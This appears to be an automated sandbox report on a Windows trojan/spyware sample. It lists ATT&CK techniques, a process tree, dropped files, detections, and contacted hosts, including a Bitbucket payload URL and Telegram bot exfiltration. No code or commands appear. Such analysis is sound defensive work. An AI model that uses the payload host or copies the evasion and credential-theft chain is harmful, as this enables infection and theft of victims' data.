            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Shared Modules            		1
            Valid Accounts            		1
            Valid Accounts            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            System Network Connections Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		Security Account Manager1
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		11
            Encrypted Channel            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
            Process Injection            		3
            Software Packing            		NTDS36
            System Information Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
            Registry Run Keys / Startup Folder            		1
            Timestomp            		LSA Secrets251
            Security Software Discovery            		SSHKeylogging114
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            File Deletion            		DCSync2
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
            Masquerading            		Proc Filesystem1
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Valid Accounts            		/etc/passwd and /etc/shadow1
            System Network Configuration Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            Access Token Manipulation            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd41
            Virtualization/Sandbox Evasion            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
            Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task311
            Process Injection            		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562871 Sample: EPTMAcgvNZ.exe Startdate: 26/11/2024 Architecture: WINDOWS Score: 100 58 api.telegram.org 2->58 60 s3-w.us-east-1.amazonaws.com 2->60 62 5 other IPs or domains 2->62 80 Suricata IDS alerts for network traffic 2->80 82 Found malware configuration 2->82 84 Malicious sample detected (through community Yara rule) 2->84 88 15 other signatures 2->88 9 EPTMAcgvNZ.exe 1 7 2->9         started        14 Cobsfhiy.PIF 2->14         started        16 Cobsfhiy.PIF 2->16         started        signatures3 86 Uses the Telegram API (likely for C&C communication) 58->86 process4 dnsIp5 68 bitbucket.org 185.166.143.48, 443, 49701, 49702 AMAZON-02US Germany 9->68 70 s3-w.us-east-1.amazonaws.com 16.182.70.225, 443, 49703 unknown United States 9->70 48 C:\Users\Public\Libraries\yihfsboC.pif, PE32 9->48 dropped 50 C:\Users\Public\Libraries\Cobsfhiy, data 9->50 dropped 52 C:\Users\Public\Cobsfhiy.url, MS 9->52 dropped 98 Drops PE files with a suspicious file extension 9->98 100 Writes to foreign memory regions 9->100 102 Allocates memory in foreign processes 9->102 104 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 9->104 18 cmd.exe 1 9->18         started        20 yihfsboC.pif 15 2 9->20         started        24 esentutl.exe 2 9->24         started        106 Antivirus detection for dropped file 14->106 108 Multi AV Scanner detection for dropped file 14->108 110 Machine Learning detection for dropped file 14->110 27 yihfsboC.pif 14->27         started        112 Sample uses process hollowing technique 16->112 29 yihfsboC.pif 16->29         started        file6 signatures7 process8 dnsIp9 31 esentutl.exe 2 18->31         started        35 alpha.pif 1 18->35         started        37 esentutl.exe 2 18->37         started        41 6 other processes 18->41 64 checkip.dyndns.com 132.226.8.169, 49710, 49741, 49758 UTMEMUS United States 20->64 66 api.telegram.org 149.154.167.220, 443, 49742, 49764 TELEGRAMRU United Kingdom 20->66 90 Detected unpacking (changes PE section rights) 20->90 92 Detected unpacking (overwrites its own PE header) 20->92 94 Tries to steal Mail credentials (via file / registry access) 20->94 46 C:\Users\Public\Libraries\Cobsfhiy.PIF, PE32 24->46 dropped 39 conhost.exe 24->39         started        96 Tries to harvest and steal browser information (history, passwords, etc) 29->96 file10 signatures11 process12 file13 54 C:\Users\Public\alpha.pif, PE32 31->54 dropped 74 Drops PE files to the user root directory 31->74 76 Drops PE files with a suspicious file extension 31->76 78 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 31->78 43 xpha.pif 35->43         started        56 C:\Users\Public\xpha.pif, PE32 37->56 dropped signatures14 process15 dnsIp16 72 127.0.0.1 unknown unknown 43->72

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            EPTMAcgvNZ.exe63%ReversingLabsWin32.Trojan.ModiLoader
            EPTMAcgvNZ.exe71%VirustotalBrowse
            EPTMAcgvNZ.exe100%AviraTR/AD.Nekark.pgnqj
            EPTMAcgvNZ.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\Libraries\Cobsfhiy.PIF100%AviraTR/AD.Nekark.pgnqj
            C:\Users\Public\Libraries\Cobsfhiy.PIF100%Joe Sandbox ML
            C:\Users\Public\Libraries\Cobsfhiy.PIF63%ReversingLabsWin32.Trojan.ModiLoader
            C:\Users\Public\Libraries\yihfsboC.pif3%ReversingLabs
            C:\Users\Public\alpha.pif0%ReversingLabs
            C:\Users\Public\xpha.pif0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
            http://www.microsoft.co~eE0%Avira URL Cloudsafe
            https://api.telegram.orgpj0%Avira URL Cloudsafe
            https://bbc-frontbucket-canary.prod-east.f0%Avira URL Cloudsafe
            https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net0%Avira URL Cloudsafe
            http://www.microsoft.cfdm0%Avira URL Cloudsafe
            https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            s3-w.us-east-1.amazonaws.com
            		16.182.70.225
            		truefalse
              		high
              bitbucket.org
              		185.166.143.48
              		truefalse
                		high
                api.telegram.org
                		149.154.167.220
                		truefalse
                  		high
                  checkip.dyndns.com
                  		132.226.8.169
                  		truefalse
                    		high
                    bbuseruploads.s3.amazonaws.com
                    		unknown
                    		unknownfalse
                      		high
                      checkip.dyndns.org
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://bitbucket.org/ntim1478/gpmaw/downloads/240_Cobsfhiygmxfalse
                          		high
                          http://checkip.dyndns.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                              		high
                              https://bitbucket.org/EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://sectigo.com/CPS0EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  https://bbuseruploads.s3.amazonaws.com/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bb79-EPTMAcgvNZ.exe, 00000000.00000002.1354974339.0000000000829000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://api.telegram.orgyihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260F4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.sectigo.com0EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.telegram.org/botyihfsboC.pif, 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://microsoft.coyihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://web-security-reports.services.atlassian.com/csp-report/bb-websiteEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://checkip.dyndns.orgyihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://bitbucket.org/ntim1478/gpmaw/dowEPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000208FD000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://dz8aopenkvv6s.cloudfront.netEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://www.microsoft.co~eEyihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://checkip.dyndns.org/hyihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.telegram.orgpjyihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://remote-app-switcher.prod-east.frontend.public.atl-paas.netEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.netEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://checkip.dyndns.org/pyihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cdn.cookielaw.org/EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://crl.microsoft.cyihfsboC.pif, 0000000E.00000002.2542798252.0000000028C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://aui-cdn.atlassian.com/EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://bbuseruploads.s3.amazonaws.com/;EPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;EPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://bbuseruploads.s3.amazonaws.com:443/e427e629-62a6-4ecd-bf22-56e4d6ea083f/downloads/d4025bf5-bEPTMAcgvNZ.exe, 00000000.00000002.1353822380.00000000007EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://bbc-frontbucket-canary.prod-east.fEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://remote-app-switcher.stg-east.frontend.public.atl-paas.netEPTMAcgvNZ.exe, 00000000.00000003.1327271829.0000000000827000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://api.telegram.orgyihfsboC.pif, 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034D60000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameyihfsboC.pif, 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.pmail.comEPTMAcgvNZ.exe, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.0000000020840000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1351068324.00000000217FB000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1351068324.000000002179D000.00000004.00000020.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1415066252.000000007FB20000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1409907919.0000000021A70000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000002.1396601704.00000000207F0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000000.1351694799.0000000000416000.00000002.00000001.01000000.00000006.sdmp, yihfsboC.pif, 0000000E.00000001.1352324440.00000000011AF000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000000.1460253775.0000000000416000.00000002.00000001.01000000.00000006.sdmp, yihfsboC.pif, 0000001A.00000000.1548597466.0000000000416000.00000002.00000001.01000000.00000006.sdmp, yihfsboC.pif.0.drfalse
                                                                                        		high
                                                                                        http://ocsp.sectigo.com0CEPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crl.microsyihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000002.2547471233.00000000374F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.microsoft.cfdmyihfsboC.pif, 00000017.00000003.1647444875.000000003753B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown

                                                                                            World Map of Contacted IPs

                                                                                            • No. of IPs < 25%
                                                                                            • 25% < No. of IPs < 50%
                                                                                            • 50% < No. of IPs < 75%
                                                                                            • 75% < No. of IPs

                                                                                            Public IPs

                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                            132.226.8.169
                                                                                            		checkip.dyndns.comUnited States
                                                                                            		16989UTMEMUSfalse
                                                                                            149.154.167.220
                                                                                            		api.telegram.orgUnited Kingdom
                                                                                            		62041TELEGRAMRUfalse
                                                                                            185.166.143.48
                                                                                            		bitbucket.orgGermany
                                                                                            		16509AMAZON-02USfalse
                                                                                            16.182.70.225
                                                                                            		s3-w.us-east-1.amazonaws.comUnited States
                                                                                            		unknownunknownfalse

                                                                                            Private

                                                                                            IP
                                                                                            127.0.0.1

                                                                                            General Information

                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                            Analysis ID:1562871
                                                                                            Start date and time:2024-11-26 08:23:45 +01:00
                                                                                            Joe Sandbox product:CloudBasic
                                                                                            Overall analysis duration:0h 10m 43s
                                                                                            Hypervisor based Inspection enabled:false
                                                                                            Report type:full
                                                                                            Cookbook file name:default.jbs
                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                            Number of analysed new started processes analysed:33
                                                                                            Number of new started drivers analysed:0
                                                                                            Number of existing processes analysed:0
                                                                                            Number of existing drivers analysed:0
                                                                                            Number of injected processes analysed:0
                                                                                            Technologies:
                                                                                            • HCA enabled
                                                                                            • EGA enabled
                                                                                            • AMSI enabled
                                                                                            Analysis Mode:default
                                                                                            Analysis stop reason:Timeout
                                                                                            Sample name:EPTMAcgvNZ.exe
                                                                                            renamed because original name is a hash value
                                                                                            Original Sample Name:059971ff3a7ed8438ae50f1ae60bc161e93c0b32f8a2b3c5a0e56bbfa05d9cd5.exe
                                                                                            Detection:MAL
                                                                                            Classification:mal100.troj.spyw.evad.winEXE@34/11@5/5
                                                                                            EGA Information:
                                                                                            • Successful, ratio: 100%
                                                                                            HCA Information:
                                                                                            • Successful, ratio: 96%
                                                                                            • Number of executed functions: 212
                                                                                            • Number of non-executed functions: 42
                                                                                            Cookbook Comments:
                                                                                            • Found application associated with file extension: .exe

                                                                                            Warnings

                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                            • Report size getting too big, too many NtOpenFile calls found.
                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
